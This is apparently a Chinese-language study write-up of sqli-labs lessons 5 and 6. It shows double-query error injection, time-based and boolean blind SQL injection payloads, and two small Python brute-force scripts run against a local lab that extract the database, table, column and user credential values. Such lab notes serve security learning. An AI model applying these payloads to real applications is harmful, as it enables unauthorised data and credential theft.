前言

继续学习sqli-labs 本篇是less5-6

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

输入?id=1 正常回显 尝试'、"、)等 单引号时报错 但这不像前面的基于错误的注入 用union select无法返回内容

这是个双注入、布尔型盲注、时间延迟型盲注

（1）双注入

根据题目意思是想用这个 参考：双查询注入

爆库名

?id=-1'union select count(*),count(*), concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

但这个方法有随机性（未知原因）

爆表名

?id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+ ?id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 3,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

修改limit x,1 可以遍历表名 爆列名

?id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 4,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

爆值

?id=-1' union select count(*),1, concat('~',(select concat_ws('|||',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

'|||'是分隔符 修改limit x,1 可以显示第x个用户的password和username

（2）时间延迟盲注

时间延迟型手工注入，正确会延迟，错误没有延迟

验证payload

?id=1' and sleep(5)--+

延迟5s后返回 说明存在时间延迟注入 以下建议sqlmap或自己写脚本

爆库长

?id=1' and if(length(database())=8,sleep(5),1)--+

试到8的时候延迟 并返回 数据库长度为8

爆库名 不断猜测第一个字符 试到延迟 再猜第二个字符 一直猜到8个

?id=1' and if(left(database(),1)='s',sleep(5),1)--+ ?id=1' and if(left(database(),2)='se',sleep(5),1)--+

最终爆破得到left(database(),8)='security'

爆表名

?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+ ?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' ,sleep(5),1)--+

爆列名

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 5,1),8)='password' ,sleep(5),1)--+ ?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='username' ,sleep(5),1)--+

爆值

?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+ ?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

得到用户名密码分别为dumb和dumb

以上纯手工会死人的 建议sqlmap和脚本

（3）布尔型盲注

布尔型注入中，正确会回显，错误没有回显

猜数据库版本

?id=1'and left(version(),1)=4--+ ?id=1'and left(version(),1)=5--+

版本是5

爆数据库长度

?id=1'and length(database())=8--+

长度为8

脚本

# -*- coding: utf-8 -*- # filename:Less05-2 database_length.py import hackhttp import re def database_length(arg): print "database_length start test..." length="" for j in range(1,20): hh = hackhttp.hackhttp() msg = "1%27and%20length(database())={j}--+".format(j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: length=j break print "数据库的长度为: {length}".format(length=length) if __name__ == '__main__': database_length('http://127.0.0.1/sqli-labs/Less-5/?id=')

爆库名

?id=1' and left((select database()),1)='s'--+ ?id=1' and left((select database()),1)>'t'--+

这里可以用大于小于进行二分

可以看>'t’无回显，而<'t’有回显 脚本

# -*- coding: utf-8 -*- # filename：Less05-3 database_name.py import hackhttp import re def database_name(arg): print "database_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') name="" for i in range(1,20): for j in payloads: hh = hackhttp.hackhttp() msg = "1%27and%20mid(database(),{i},1)=%27{j}%27--+".format(i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: name+=j print "第%s位是%s" % (i,j) break print "数据库的版本为: {name}".format(name=name) if __name__ == '__main__': database_name('http://127.0.0.1/sqli-labs/Less-5/?id=')

得到数据库名security

爆表名

?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+

爆列名

?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 5,1),8)='password' --+ ?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='username' --+

爆值

?id=1' and left((select password from users order by id limit 0,1),1)='d' --+ ?id=1' and left((select username from users order by id limit 0,1),4)='dumb' --+

仍然建议sqlmap或脚本

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

上一题是单引号 这题是双引号 不再赘述

结语

主要是

双注入布尔型盲注时间延迟型盲注